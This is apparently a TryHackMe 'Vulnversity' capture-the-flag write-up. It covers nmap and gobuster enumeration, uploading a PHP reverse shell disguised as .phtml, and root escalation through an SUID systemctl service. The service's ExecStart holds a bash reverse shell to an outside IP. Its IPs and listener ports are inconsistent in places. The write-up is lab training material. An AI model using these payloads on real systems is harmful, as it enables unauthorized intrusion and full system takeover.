# Vulnversity

### TryHackMe - [Vulnversity](https://tryhackme.com/room/vulnversity) Created By [tryhackme](https://tryhackme.com/p/tryhackme)

### Scanning (IP : 10.10.46.215)

#### 1. NMAP

```
> nmap -sC -sV 10.10.46.215 > nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 05:42 EDT
Nmap scan report for 10.10.187.173
Host is up (0.19s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

#### 2. GoBuster

```
> gobuster dir -u http://10.10.46.215 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.54.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/14 05:45:27 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://10.10.187.173:3333/images/]
/css                  (Status: 301) [Size: 319] [--> http://10.10.187.173:3333/css/]   
/js                   (Status: 301) [Size: 318] [--> http://10.10.187.173:3333/js/]    
/fonts                (Status: 301) [Size: 321] [--> http://10.10.187.173:3333/fonts/] 
/internal             (Status: 301) [Size: 324] [--> http://10.10.187.173:3333/internal/]

[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:53:07 Finished
===============================================================


> gobuster dir -u http://10.10.46.215/internal/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.54.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/14 05:53:39 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 332] [--> http://10.10.187.173:3333/internal/uploads/]
/css                  (Status: 301) [Size: 328] [--> http://10.10.187.173:3333/internal/css/]    

[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:54:16 Finished
===============================================================
```

### Upload Malacious PHP FIile <a href="#upload-malacious-php-fiile" id="upload-malacious-php-fiile"></a>

Some Php extensions are blacklisted but .phtml extension works here. Php-reverse shell can be found `/usr/share/webshells/php/php-reverse-shell.php` in Kali Linux. Change IP to your IP and open a netcat listner on port 1234. `nc -lnvp 1234` . Now, You get the reverse shell and can get `user.txt`.

### Privileges **escalations** (root.txt) <a href="#privileges-escalations-root-txt" id="privileges-escalations-root-txt"></a>

I upload `Linpeas.sh` on Target Box to get the information about system. Then, I found a weird SUID file `/bin/systemctl`. This binary with run a service as a root on target server. Service File -  (`root.service`)

```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.21.93/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

Now to enable service `/bin/systemctl enable /var/tmp/root.service`And to start it `/bin/systemctl start root` , for netcat listner `nc -lnvp 1234` .Now you get the reverse shell with root privileges. Now, `cat /root/root.txt`.